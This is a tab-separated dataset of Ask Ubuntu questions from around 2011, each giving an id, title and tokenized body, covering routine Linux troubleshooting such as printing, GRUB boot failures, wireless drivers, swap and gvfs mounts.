61095	use different username on cups remote printing	i 'm using cups to print on an enterprise network . the job gets submitted fine , but i need to submit it as another username . now i 'm jon but i need to send it as say jonallard . on the command line , one could print as such lp -u jonallard -d printer1 file.ext how do i customize the username part when using the gui printing dialogs and the printing system settings ? it is possible that it is n't , in fact , possible to add this username to the ubuntu print config . if so , where should i ask for an improvement ?
61100	use generated kerberos tickets in chromium browser	has anyone had luck using kerberos tickets generated with kinit in chromium for authenticating to websites ? the company i work for supports kerberos authentication to internal websites , and i 'm able to configure firefox to use generated kerberos tickets by configuring network.negotiate-auth.delegation-uris and network.negotiate-auth.trusted-uris but i do n't if/how i can do this in chromium ...
61101	downgrade php to php5.2 ?	i want to install php 5.2 in ubuntu 11.04 , i had some script that did that thing good but only on ubuntu 9 , anyone has a script / instructions how to do it ?
61104	how do i create highlights on a screenshot ?	in chipaca 's to managing files and sync scenarios there 's a screenshot with certain highlights . the highlights are the following : a row of a gui list is highlighted by the other parts of the screenshot being darker . a check mark is highlighted by being circled by what looks like a ( orange ) crayon . how do i create both of these highlights on a screenshot ? is there an automated process ? the screenshot i 'm referring to looks like this :
61105	nautilus menu appearing behind transparent gnome-shell menubar	i installed 11.10 beta when it was released a couple of weeks ago . everything is working fine . later i installed gnome shell and then upgraded it from the gnome-shell testing ppa . i also installed and enabled all the gnome-shell-extensions available on the ppa . there is only one problem . when ever i switch to a theme which has a transparent gnome-shell menu i see nautilus menu behind it . it only disappears when i quit nautilus . i do n't know i to get rid of it so that i can use use themes like nord and malys properly . here is a screenshot :
61112	what 's the default serif font in firefox ?	i 'm trying to come up with a solid font stack that incorporates fonts typically found on an ubuntu install . font-family=serif looks great , but for obvious reasons , this is n't appropriate for other operating systems . what font does `` serif '' resolve to in the default install ? i 'm on firefox 6 . edit- > preferences- > content- > fonts & colors/advanced ... - > serif is set to `` serif '' so it seems like it 's using whatever ubuntu defines as the `` serif '' font . how can i tell what that is ? i 'm on 11.04 ( from a fresh install ) thanks
61118	how do i recover a btrfs partition formatted by mkfs.btrfs ?	i 've accidentally formatted one of my partitions with btrfs 0.19 filesystem , on 11.04 , kernel 2.6.38-8-generic . the command issued was : mkfs.btrfs -l eads-old /dev/sdd2 . after this i did n't write anything on this disk , it was only mounted few times . and the disk is obviously clean at a first glance . how do i recover the data from it ? it has quite a lot valuable data and i do n't afford to backup the whole 1t of data . i 've tried testdisk program but i was unable to find any partitions nor usable data .
61119	suddenly lost my wifi card ?	i have a bcm4312 wireless card ( dell inspiron 1545 ) . i have suddenly lost my wireless card ! well , not literally , its still in my laptop , but ubuntu denies all knowledge of it even existing ! i 've tried lspci - not there , i 've grep 'd the lspci to be sure i 'm not just crazy , it 's not there . its also not acknowledged as being there in additional drivers - `` no proprietary drivers are in use on this system '' . this is very frustrating ! any ideas ? i 'm completely stumped . on a semi-related note , if i cant get it working , is there a wireless mini card that is open source that works with the dell inspiron 1545 ?
61122	gnome-keyring use unsafe storage for all users	i 'm running a large number of ubuntu desktops for a school . we use ldap and somehow gnome-keyring always gets out of sync and starts prompting for passwords . eventually it seems to sync again , but i get calls all the time because of a mysterious password box showing up . i know how to set it to unsafe storage for one user , but is there a way to force this on all users ? something in /etc/skel would be fine i suspect the reason it gets out of sync is because we use a little web app to change passwords . this is necessary because it also changes google and samba passwords for the user .
61136	how can i check if i messed up my encrypted swap configuration ?	on my machine running 11.04 , i somehow managed to remove the partition which was used as swap , while i was repartitioning the hard drive . i then turned off swap and tried to reconfigure it with a different partition . ( i had wanted to do that anyway . ) `` /etc/fstab '' contained the following line : /dev/mapper/cryptswap1 none swap sw 0 0 looking at `` /etc/crypttab '' , i found a reference to the old swap partition , sda7 : cryptswap1 /dev/sda7 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 i changed the line to use the new partition /dev/sda2 , which i had formatted as swap : cryptswap1 /dev/sda2 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 i then turned swap back on , and it seems to work . `` free -m '' now tells me i have the 4 gb free swap space available in the partition , even after restarting . however , i am a little suspicious that it should be so easy to just rewire swap through one little file entry . also , the disk utility does not show the partition as being used as swap ; it says `` usage : - '' . have i missed something ? are there other or additional steps i should follow to properly reconfigure the swap partition ?
61138	how can i hibernate from gnome shell ?	gnome shell does n't have an option to hibernate in the session menu . i checked the gnome shell cheat sheet but hibernate is not mentioned there . how can i hibernate my machine from within a gnome shell session ?
61141	compiling vim-gnome with ruby support	i followed this blog post to compile gvim with ruby support . however , when i make , i get this error : /usr/bin/ld : can not find -lruby-static collect2 : ld returned 1 exit status link.sh : linking failed make [ 1 ] : *** [ vim ] error 1 make [ 1 ] : leaving directory `/home/ramon/vim/src' make : *** [ first ] error 2 i searched around for people who had this problem , and could n't find any . this guy just changed computers altogether . and yes , i have ruby : $ ruby -v ruby 1.8.7 ( 2010-08-16 patchlevel 302 ) [ i686-linux ] what do i do ?
61144	how do i get hdmi output working on a dell xps 15 l502x ?	recently i 've bought my dream 's notebook , a dell xps 15 but since then this dream became a kind of endless nightmare . i 'm almost getting crazy to make my graphic card driver work properly , but it seems to be just impossible . yes , i have a 2gb nvidia geforce gt 540m ( optimus ) in it ! it simply does n't work . every time i generate the xorg.conf ubuntu hangs on while starting up , which forces me to remove this file to be able to start the notebook with the standard graphic settings . another problem is that the dell xps 15 does not have a vga output , but a hdmi . so , to be able to use a second monitor i have to configure it by the nvidia x server settings , which just works if the driver is properly initialized with the xorg.conf . i 've also tried to make it work with the bumblebee , but unfortunately it did n't help me much with the hdmi output . do you guys have any idea to solve this deadlock ? is there any way for me to use my second monitor ?
61146	i installed supertuxcart and ca n't figure out how to launch it	i installed supertuxcart and ca n't figure out how to launch it or how to get unity to point to it . ( my system is amd 939 4400x2 , overclocked @ 2600mhz , dfi lanparty ut expert motherboard , 2x1gig khx 400-xfx 7600 512mbx2 sli , sata1 320gig root sata1 400gig , both seagates . )
61152	any recommendations for a command-line download manager ?	any command-line download accelerator/manager recommendations for ubuntu 11.04 ? i tried some programs like axel wget/curl i wanted to know if there are any command-line download managers which have a `` resume download '' feature . edit 1st download : axel -a -n 10 http : //yui.zenfs.com/theater/f2esummit2011-tso.mp4 initializing download : http : //yui.zenfs.com/theater/f2esummit2011-tso.mp4 file size : 316943546 bytes opening output file f2esummit2011-tso.mp4 state file found : 5412634 bytes downloaded , 311530912 to go . starting download connection 1 unexpectedly closed ] connection 2 unexpectedly closed ] connection 9 unexpectedly closed ] connection 6 unexpectedly closed ] connection 8 unexpectedly closed ] connection 3 unexpectedly closed ] connection 5 unexpectedly closed ] [ 6 % ] [ 0 1 2 3 4 5 6 7 8 9 ] [ 58.3kb/s ] [ 1h22 ] this is what i did : i ran two simultaneous downloads . but with axel , i 'm getting the below error : segmentation error 2nd download : axel -v -a -n -10 http : //yui.zenfs.com/theater/f2esummit2011-glass.mp4 initializing download : http : //yui.zenfs.com/theater/f2esummit2011-glass.mp4 segmentation fault
61155	blank screen after grub ( 64 bit ) - can not install ubuntu	my laptop 's specs : lenovo ideapad z570 intel core i5-2410m @ 2.3ghz 6 gb ram ddr3 640 gb atapi hard-disk drive @ 5,200 rpm nvidia geforce g520m with optimus switching technology broadcom 802.11n network adapter realtek soundcard windows 7 home premium 64-bit i downloaded ubuntu studio 11.04 and burned the iso image onto two different dvds , using two different programs ( one dvd is rw , the other is just r ) . i verified the hash md5sum thing . i get as far as grub with the 4 options ( install , advanced install , disk verification , system rescue ) but no matter which one i select , i get a blank screen and nothing happens . the dvd drive spins down after about 30 seconds . also just before the grub screen i get a message saying error : `` prefix '' is not set . i 'm not sure if that 's relevant . i have tried all the options using both dvds . same thing happens . i have changed the graphics setting in bios to uma or optimus , but still happens either way . i 've tried booting with the wireless switch turned off , same thing happens . i downloaded 'vanilla ' ubuntu 64-bit and burned onto a cd , and the same thing happens . i have downloaded ubuntu 32-bit and i am able to boot from the live cd ( interestingly the wireless card wo n't work , but that 's maybe another issue ) . i have searched extensively through these forums and other sites but i ca n't see anything that will help me . is there something i 'm missing ? i 'd really appreciate help on this . the laptop is less than 2 weeks old . i was so looking forward to getting ubuntu studio up and running . i 've gone about as far as my technical abilities will allow . thanks for taking the time to reply to my initial post . i 'm having another go at installing ubuntu 64-bit seeing as 11.10 is now out . i 've created a live cd for 11.10 amd 64 . now what happens is that i get the `` prefix '' is not set message , then it goes to a screen with a heavily distorted text , and that 's it ... . so 11.10 is not booting for me for me either . this seems crazy to me ... please does anyone have any ideas ? a solution was posted here ( http : //ubuntuforums.org/showthread.php ? p=11497240 # post11497240 ) but i do n't quite follow it - it 's written from the perspective of someone who already has linux and is upgrading , which does n't apply to me at all . but the basic premise of it - that you could use the bootfiles from 10.04 64-bit - makes sense . how would i - as someone who does n't have experience of these things - blend the bootfiles from 10.04 wit the .iso image for 11.10 ? ? ? ok i got it sorted ... i think . before that , just to mention that ubuntu studio is only available as an alternate image , so you ca n't boot it as a live cd/usb . i did not know this . but i could n't even get to the install menu anyway in 64-bit . i kind of managed to figure it out based on staticd 's solution : [ url ] http : //ubuntuforums.org/showthread.php ? p=11497240 # post11497240 [ /url ] i could n't fully use this solution because he/she appears to be starting from ubuntu , whereas i 'm still on windows . so my method is for creating a live usb from a windows machine . oh - i 'm trying 11.10 now as opposed to 11.04 , but i had the exact same problem with the live cd for 11.10 . i downloaded ubuntu 64-bit 10.04 . i also downloaded ubuntu 64-bit 11.10 . i then created a live usb for 10.04 using unetbootin . i extracted ubuntu 64-bit 11.10 to a normal windows folder using winrar . i opened up the folder for the live usb in windows explorer . i deleted the following folders from the 10.04 live usb : .disk , casper , dists , install , pics , pool , preseed ( i.e . everything apart from the isolinux folder ) . i then copied all items from the 11.10 folder ( so that 's everything except for boot , efi and isolinux folders ) into the live usb folder . replace any files that have the same name . i was then able to boot into the live usb and into a live ubuntu 64-bit session . this method also worked to allow me to get as far as the installation menu in ubuntu studio 64-bit . word of caution : this method worked to allow me to try a live session . however , i do n't know ( because it 's beyond my technical understanding ) if messing with the .iso image like this will cause problems for an actual installation ...
61160	youtube fails to load video	i 'm currently using natty . i 've used adobe 's version of flash found on their website , the one found in the depository , and finally the one from sevenmachines ppa . all the flash plugins have the same issue : the video on youtube and the playback controls fail to load . the audio works just fine , as does the html page itself . just no video , or controls . same issue happens on google chrome and in firefox . further making this issue strange is that it 's only limited to youtube and no other video website .
61161	ca n't download web photo albums to picasa	someone has shared a picasa web album ( limited , anyone with the link ) , but i ca n't download it to picasa . the following alert appears : firefox does n't know how to open this address , because the protocol ( picasa ) is n't associated with any program . i have picasa 3.0.0 installed on ubuntu 11.04 , i remember it saying something about registering the picasa protocol with firefox during the installation . i have firefox 6.0.2 , and these settings are present in about : config network.protocol-handler.app.picasa ; /usr/bin/picasa network.protocol-handler.expose.picasa ; true network.protocol-handler.external.picasa ; true picasa is located here : $ which picasa /usr/bin/picasa is there something i can do to make this work ? ps : i hope this is not off-topic here , and i ca n't find the `` picasa '' tag . could someone please add it , if appropriate ?
61162	how to configure/install hotspotshield ?	how to configure/install hotspotshield under ubuntu 11.04 ; are there any other opensource vpn thru which we can see sites like www.hulu.com which are restricted outside of usa especially thru ubuntu 11.04+ . let me put this way , i wanted surf web securely by having dedicated secure vpn and i want keep the server at a centralized place . i usually travel in and out of usa ; currently i would like to try out home grown solution or open source service . refer ( the below sites says about installation and configuration ) http : //www.kalvster.com/tools/vpn-ubuntu-hotspot-shield.html http : //www.youtube.com/watch ? v=njp -- zoeufa
61166	kernel update failed using apt-get dist-upgrade	i have ubuntu 11.04 on my dell inspiron i did an upgrade using following commands apt-get update apt-get upgrade apt-get dist-upgrade now on restarting the system , the latest kernel version does not boot up , leaving me with blinking caps light . it seems like system just hangs up . though previous kernel is still bootable ( thank god ! ! ) what might be the problem and how can i solve it . edit : output of df and cat /etc/fstab nikhil @ dell : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sda7 106802240 10149900 91227088 11 % / none 1973500 736 1972764 1 % /dev none 1981208 252 1980956 1 % /dev/shm none 1981208 96 1981112 1 % /var/run none 1981208 0 1981208 0 % /var/lock nikhil @ dell : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda7 during installation uuid=b6f842c2-bbc6-41e0-bb4e-88125ba0b2d1 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=97b9c281-e852-41a7-8f3d-e511915c4013 none swap sw 0 0 edit : even using sudo update-initramfs -u -k 2.6.38-11-generic sudo update-grub has not helped .
61168	how to use stdeb with launchpad ?	i know that launchpad has the policy of only allowing upload of source packages on ppa 's ( as also explained here ) . yet , a python .deb package has all the source in it and it seems silly that one can not use the stdeb extension and need to build the package manually ... is there a way to get around this ? edit : from the first answers it seems i should clarify that i am developer who wrote the code , so i am really looking for the quicker way to make my program become a .deb in my ppa . i normally get .deb package in my system with : python setup.py -- command-packages=stdeb.command bdist_deb give that this allow me to reuse my setup.py script , which is standard in all python programs . i had a look at the python packaging guide here but it looks like i 'm missing something , as it 's hard to believe that in order to achieve the same result than the above one-liner i should work 10 times more ... ?
61177	what 's the easiest way to remove the `` total < size > '' line from the output of ls -l ?	the best i could find via google/man ls was : ls -l | grep -v '^total' is there something i 'm missing in the flags to ls ? also , why is the total size in kb , regardless of the -h flag ? scratch that , seems like it does , not sure what i was seeing then .
61179	find the latest file by modified date	if i want to find the latest file ( mtime ) in a ( big ) directory containing subdirectories , how would i do it ? lots of posts i 've found suggest some variation of ls -lt | head ( amusingly , many suggest ls -ltr | tail which is the same but less efficient ) which is fine unless you have subdirectories ( i do ) . then again , you could find . -type f -exec ls -lt \ { \ } \+ | head which will definitely do the trick for as many files as can be specified by one command , i.e . if you have a big directory , -exec ... \+ will issue separate commands ; therefore each group will be sorted by ls within itself but not over the total set ; the head will therefore pick up the lastest entry of the first batch . any answers ?
61187	persisting increased playback speed between videos in vlc	the playback speed reverts to 1x with every new video in a playlist , however , this is n't the behavior i want . is there a way to make a selected playback speed persist throughout an entire playlist without re-encoding all the media ?
61191	how to configure tomcat6 service	i want to change the startup parameters of tomcat6 on ubuntu , running as a service . i want to give it more memory . what is the best way to do this ?
61196	why do my gvfs mounts not show up under ~/.gvfs or /run/user/ < login > /gvfs ?	from what i read , when mounting a network share via nautilus or gvfs-mount the mount point should be in ~/.gvfs . this seems not to be the case for me : i tried mounting both an ftp and smb share via both nautilus and gvfs-mount under both ubuntu maverick and natty and in none of the cases did i see any mount point under ~/.gvfs . i can access the shares just find in nautilus , but i want to have access via the command line , which is why i need a mount point in the file system . edit : debugging following james henstridge 's answer and enzotib 's comment revealed that on my laptop gvfs-fuse-daemon is running and consequently gvfs mounts show up in ~/.gvfs , whereas on the 2 workstations where ~/.gvfs remained empty gvfs-fuse-daemon was not running . on all 3 machines there are other gvfs processes running : gvfsd , gvfs-afc-volume-monitor , ... on the laptop , mount | fgrep gvfs yields gvfs-fuse-daemon on /home/xxx/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=xxx ) that raises the questions : how are shares mounted without gvfs-fuse-daemon running ? is there no mount point created in that case and is every access to the share a gvfs library call ? which daemon is responsible ? gvfsd ? what 's the role of gvfs-fuse-daemon ? does it only create a fuse mount point in ~/.gvfs ? update : on 12.10 and later , mounts are under /run/user/ < login > /gvfs .
61201	how to have a grub like in ubuntu-light ?	how can i make my grub screen look like that of ubuntu light . i would like to have a grub menu similar to this picture :
61208	how to recover from mounting /usr/ nosuid	i was able to move /usrto an external harddrive . in fstab i mistakenly mounted the drive with nosuid . now i ca n't use sudo or su . i ca n't edit the fstab entry . when i manage to open it i ca n't do so as root and it therefore is read-only . i can provide more details if need be . how can i fix this ?
61212	call transfer/forward with ekiga/jitsi ?	im trying to configure my lucid 10.04.03 in order to work with sip phones ; actually , ekiga and jitsi* works fine , except for the call transfer/forward , that is very important for me . with ekiga , i press first h to hole , then t to transfer , then the number of a my colleague , but nothings happen . with jitsi , i get an `` not implemented '' error , lose the call and keep the sip account busy for about 30 seconds ( strange thing is that jitsi should implement the transfer in the last stable version , but i tryed both the nighly and the stable ) twinkle , linphone , qutecom ; i 've tryed them all but noone works with transfer/forward . any idea ? p.s : i 'll love to get jitsi work becose it support even gtalk/jabber , so i can have 1 app to all my contacs . update from the twinkle manual : when you want to transfer a standing call to another party you press the xfer button . this will popup a dialog box from which you can choose what kind of call transfer you want . blind call transfer transfer with consultation transfer to other line call transfer will only work if your sip provider and/or the remote party supports the proper sip extensions . this could be the reason why my xfer button is disabled , but my colleagues can transfer call without problem , they 're using x-lite on macosx , so i guess my sip does support call transfer ...
61217	how do i access my nas from an application ?	i need to access my files on my nas . specifically how do i access my nas from sheetmaker - i need to access the movies ' folders through the home network ? that 's not a problem for thumbgen in windows , but sheetmaker has n't mentioned option . for example , my movies resides on my home nas and i need to connect it directly to my laptop everytime for making sheets and thumbnails . it would be great to do that without odd job with direct connection . does someone knows any scripts or utilities for improving sheetmaker 's functionality ?
61221	why is my system showing less memory ( ram ) than is actually installed ?	yesterday i bought a new laptop with 4gb ram . when i installed ubuntu 11.10 ( beta ) it is showing 1.5gib ( 2gb-512mb graphics ) ignoring the 2gb . uname -a : linux js 3.0.0-11-generic-pae # 17-ubuntu smp fri sep 9 19:38:01 utc 2011 i686 athlon i386 gnu/linux dmidecode : # dmidecode 2.9 smbios 2.7 present . handle 0x0016 , dmi type 16 , 23 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 8 gb error information handle : not provided number of devices : 2 handle 0x0018 , dmi type 17 , 34 bytes memory device array handle : 0x0016 error information handle : not provided total width : 64 bits data width : 64 bits size : 2048 mb form factor : dimm set : none locator : a1_dimm0 bank locator : a1_bank0 type : < out of spec > type detail : synchronous speed : 1333 mhz ( 0.8 ns ) manufacturer : samsung serial number : 7943ceca asset tag : a1_assettagnum0 part number : m471b5773dh0-ch9 handle 0x001a , dmi type 17 , 34 bytes memory device array handle : 0x0016 error information handle : not provided total width : 64 bits data width : 64 bits size : 2048 mb form factor : dimm set : none locator : a1_dimm1 bank locator : a1_bank1 type : < out of spec > type detail : synchronous speed : 1333 mhz ( 0.8 ns ) manufacturer : undefined serial number : 00000002 asset tag : a1_assettagnum1 part number : v01d3s82gb26826813 update when i revisited shop salesguy replaced ram , now everything works fine . the problem is defective ram ( unknown brand ) included on laptop upgrade ( came with 2gb ) .
61222	why does rsa key authentication only work when samba access is made ?	i created a public/private key to authenticate myself to my web server via ssh , and that seemed to work fine at the time . since , every time i try to log on via ssh i have a heart attack because i get the infamous `` permission denied ( public key ) '' message . i can try as many times as i like , but it does not log me on until i open the samba directory and log on to that in another window . is this a bug ? is there something i do n't understand ? is ssh meant to refuse all connections until a user is logged on through another channel ? i 'm confused .
61224	how to limit apps from writing too often and logging too much to disk ?	are there ways to keep this at a minimum or to limit it to only when necessary ? this is from powertop . i suppose with firefox there is not much that can be done unless history/cookies/cache/etc are set to never be saved . the program 'firefox-bin ' is writing to file 'webappsstore.sqlite ' on /dev/sda6 . this prevents the disk from going to powersave mode . what is this ? i do n't have a web app store addon of any kind . the program 'firefox-bin ' is writing to file 'cookies.sqlite ' on /dev/sda6 . this prevents the disk from going to powersave mode . the program firefox-bin ' is writing to file 'places.sqlite-wal ' on /dev/sda6 . this prevents the disk from going to powersave mode . what about the other apps ? the program 'flush-8:0 ' is writing to file '_cache_003_ ' on /dev/sda6 . this prevents the disk from going to powersave mode . the program 'dconf-service ' is writing to file 'user.62vc1v ' on /dev/sda6 . this prevents the disk from going to powersave mode . the program 'unity-panel-ser ' is writing to file 'user ' on /dev/sda6 . this prevents the disk from going to powersave mode .
61228	dvd drives slow down after machine runs for several hours	this problem has me stumped , but i am sure someone out there has some ideas ... on my desktop machine , i have 2 dvd drives . both are ata drives . one is a dvd-rw dl ; the other is just a dvd rom . under both ubuntu 10.04 and 10.10 i am seeing the same symptoms from both drives . when i first boot the system , the drives seem to run normally . i can watch dvds with no problem from mplayer , vlc , and even mythtv . if i leave the machine running for several hours ( say over night ) , and try to access the dvd drives in the morning , they are very , very slow ( transfer rates in 10 's of kbytes , not mbytes ) . if i then reboot the machine , things go back to normal . when the drives slow down , other function on the machine seem to be running with no problems or slowdown . looking at htop and iotop do n't show any amount of unusual activity . i have looked in dmesg and syslog , but nothing seems to out of the ordinary . i have tried enabling and disabling dma for the drives . the searching i have done on the internet suggests that some others have seen the problem . in some cases , upgrading to the 2.6.36 ( or later ) kernel has seemed to help , and in some cases it has n't . ( btw , i am currently running the latest 10.10 official kernel on the machine . ) does anyone have any ideas or suggestions on what to look at ? -- - update 2011-09-04 -- - so , inspired by sebastian 's comment , i decided to write a simple script to log a time stamp , the test dvd rom speed ( hdparm -tt /dev/sr0 ) , the hd settings for the cdrom , and the running process to a log file . the script has been running for over a day , and the dvd rom is also still running quite happily and quickly . the machine has also been on for over 2 days . it looks like a quantum problem -- as soon as you observe it , it goes away . i also made one other change since last booting , so maybe it had something to do with it . the usb mouse i had been using started periodically not working . it would just freeze up . this was both in gnome and kde . i removed that mouse from the system and installed a new usb mouse . now the mouse is working fine . perhaps the problems with the old mouse were causing secondary effects . ( i know , it sounds like a long shot . )
61233	what does grub setting grub_gfxpayload_linux=text ?	to be able to boot ubuntu 10.10 or 11.10 in my new lenovo l5210 with intel sandy bridge i need to set grub setting grub_gfxpayload_linux=text ( or i will get a blank black screen with only a cursor in a up left corner ? by setting grub_gfxpayload_linux=text i get a message error : no video mode activated . instead of the cursor in up left corner . so what does grub_gfxpayload_linux=text do exactly and what am i loosing by setting it ?
61235	how grub setting noapic affects the system ?	what are the known issues when setting grub to boot with noapic ? how does the setting affect the system or programs in it ? this quick answer explains what noapic does , but is there some example situations ? this question is connected to this problem : unable to install/boot 11.04 on a thinkpad l520 .
61236	installing a wacom bamboo one pen ( cte-460 )	i 've been looking around and following guides to get it working , but have n't gotten anything that works . here 's some information : lsusb : bus 003 device 003 : id 056a:006a wacom co. , ltd dmesg | tail ( disconnecting and reconnecting the tablet ) : [ 1932.290102 ] usb 3-2 : usb disconnect , address 2 [ 1936.260109 ] usb 3-2 : new full speed usb device using uhci_hcd and address 3 lsmod | fgrep wacom : wacom 41557 0 uname -a : linux cheddar 2.6.38-11-generic # 48-ubuntu smp fri jul 29 19:02:55 utc 2011 x86_64 x86_64 x86_64 gnu/linux
61237	25 gb available not shown in ubuntuone home folder	i bought 20+ gb of extra storage on ubuntu-one . ubuntu-one cp on my laptop correctly shows the storage available , but then the ubuntuone folder on my home shows only 3,6gb available , this creates an error if i try to upload my 10gbs of data through the ubuntu-one folder . anyone can help me out ?
61240	how to set master mode on bcm4312 to share internet from 3g usb modem	wifidocs said : broadcom cards support master mode using the reverse-engineered kernel driver . you need to enable ( or make as a module ) the softmac wireless extensions and bcm43xx wireless driver where can i download that driver and enable it ?
61242	wine application in gnome requires an extra click to become focused	i 'm using tera term , a windows virtual terminal emulator with wine due to a legacy application . everything else works wonderfully , but for some reason the window requires two clicks to gain focus . after being minimized it at first comes to the foreground and only becomes focused when its `` tab '' is pressed again on the lower panel . on linux i can not use some keys such as f1-f12 without specifying another terminal manually during login , this extra hassle is not justifiable for the end-user . with teraterm it seems to work out of the box . i did not actually install the software in the usuaul sense - i just ran the executable that i copied from a windows installation and it worked just fine besides the focus issue . i 'm not actually using ubuntu , but a modified version of it called estobuntu which comes with some additional estoninan software . i have come up with a temporary solution , but it is still a bit inconvenient by setting the gnome windows to gain focus on mouse over movement . any ideas ? thanks
61245	why superuser do n't have global menu integration ?	in unity , when running an application as a superuser , the menu is in the old-style . it 's not integrated in the global menu . why ?
61248	how do i add an rss feed in evolution ?	i want to add a couple of blogs ( mainly blogspots ) to evolution . i already installed the rss plugin and looked up what url i need to give in for the rss feed ( via http : //davesaunders.net/2009/01/how- ... -blogger-blog/ in this way , i give in the following url to follow the blogspot http : //dingoo-scene.blogspot.com/feeds/posts/default ? alt=rss but every time i do so , evolution seems to load something but hangs on 0 % . finally , i need to kill it because it does n't react any more . i also tried the other options given by the first url , but it does n't help . now , how can i read rss feeds in evolution please because it all seems so difficicult ( in kontact it worked like a charm i remember )
61254	how to update gcc to the latest version ( in this case 4.7 ) in ubuntu 10.04 ?	i have ubuntu 10.04 32-bit with gcc 4.4.3 currently installed on it . i want to upgrade it to gcc/g++ 4.7 ( i am looking for c++ 0x support ) how to update using ubuntu package manager : apt-get upgrade/install ? ? as a second option i downloaded the latest gcc snapshot file from : http : //gcc.cybermirror.org/snapshots/latest-4.7/gcc-4.7-20110709.tar.bz2 would doing ./configure make make install on this package build and install it from source ?
61271	wireless does n't work on a centrino wireless n chip in a sony vaio vpc-eg16fm/b	first off i 'd like to say that i am sort of new to linux in general . i recently bought a new sony vaio laptop ( model vpc-eg16fm/b ) and i installed ubuntu 11.04 on it but i am having problems enabling the wireless in ubuntu and when i did a wired connection to look for a proprietary driver to enable the wireless ubuntu could not find one . i googled everywhere to see if i can find a solution but i could n't find an answer for the sony vaio laptop that i have . i talked to someone i knew that worked with ubuntu/linux about this issue and he could n't find an answer for me so he recommended that i come here . the guy i talked to wanted me to share the results i got for both the 'lspci ' and 'ifconfig -a ' commands here because it might help others figure out what might be wrong . result for lspci command : 00:1b.0 audio device : intel corporation 6 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series chipset family pci express root port 1 ( rev b4 ) 00:1c.1 pci bridge : intel corporation 6 series chipset family pci express root port 2 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series chipset family pci express root port 4 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series chipset family smbus controller ( rev 04 ) 02:00.0 network controller : intel corporation centrino wireless-n + wimax 6150 ( rev 67 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5209 ( rev 01 ) 09:00.0 ethernet controller : atheros communications device 1083 ( rev c0 ) result for ifconfig -a command : tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:44 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:28 errors:0 dropped:0 overruns:0 frame:0 tx packets:28 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2016 ( 2.0 kb ) tx bytes:2016 ( 2.0 kb ) wlan0 link encap : ethernet hwaddr 40:25 : c2:4d : da:84 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) any help would be appreciated because i use ubuntu for school and for the time being i have to hold onto my old laptop until i can get the wireless on my sony vaio to work .
61276	can you dual boot osx and ubuntu if ubuntu is installed via efi and not something like refit ?	i think the title sums up the question . i want to install ubuntu via efi , but i do n't want to eliminate the osx partition either ( and i 'd still like to be able to boot either ) .
61279	how do i make an application start only in xfce ?	i would like to have an application ( most likely awn or docky ) start only on xfce , and not on kde or unity/gnome . is this possible ? if so , how would i go about doing that ?
61280	how to remove the resize grip in gtk3 windows ?	this question has already been asked and answered for gtk-2.0 here ( disable resize gripper in windows ? ) but i could n't find a way to achieve this on gtk-3.0 ( on oneiric ocelot ) . i 've seen the answer on the above link where it is needed to recompile gtk ... i seriously hope that 's not the case with gtk-3.0 and that there 's a workaround like with gtk-2.0 . now , before someone comes and asks why i would want to remove this resize grip , here 's why : i have n't used a resize grip or border in years , i use alt+click . i literally freak out when i have to use os x or windows . sometime it shows up when it should n't . splash screen , widgets , etc ... i do n't find it visually appealing . if this is hardcoded into gtk-3.0 then there should be an option in gconf or dconf to disable it . i 've fetched the source for gtk-3.0 and this seems to be related to the 063_resize_grip_default.patch where a configuration key is mentioned : `` resize-grip-default '' . when i grep for this in the themes i get this : /usr/share/themes $ grep -ri resize-grip-default * ambiance/gtk-3.0/gtk-widgets.css : -gtkwindow-resize-grip-default : false ; radiance/gtk-3.0/gtk-widgets.css : -gtkwindow-resize-grip-default : false ; if this configuration value is set to false , where does the resize grip come from ?
61281	grub looks different on reboot ( as opposed to cold boot ) - and ubuntu does n't load	i 've just installed windows xp and ubuntu 11.04 on an old hp xw4300 workstation . when ubuntu loaded for the first time , i was prompted to install the proprietary nvidia drivers , which i did . now , i 'm seeing different behaviour in the system depending on whether i 'm cold booting , or rebooting . cold boot : grub appears with purple background , looks polished . ubuntu loads normally . reboot : grub appears with black background , text is large . ubuntu splash screen does n't appear ( replaced with black and white vertical lines ) , and the boot process stops when the screen is partially filled with random ascii characters . it does n't seem to matter whether i reboot from windows or ubuntu - the symptoms are the same . any suggestions for fixing this are appreciated . update : i bypassed this problem by installing the older ubuntu 10.10 . i installed the proprietary nvidia drivers on this installation , and no problems occur ( although grub is now permanently black & white , with small text ) . @ rolandtaylor - i 'm using one monitor ( a hp l1706 ) .
61283	displaying a `` scrolling '' log file	via command line , i have a log file i 'd like to keep track of . what i want is to have , basically , a tail that refreshes when the log is updated making the text scroll upwards as new lines are appended to the log file . is there anything out there that does that without having to write some code ?
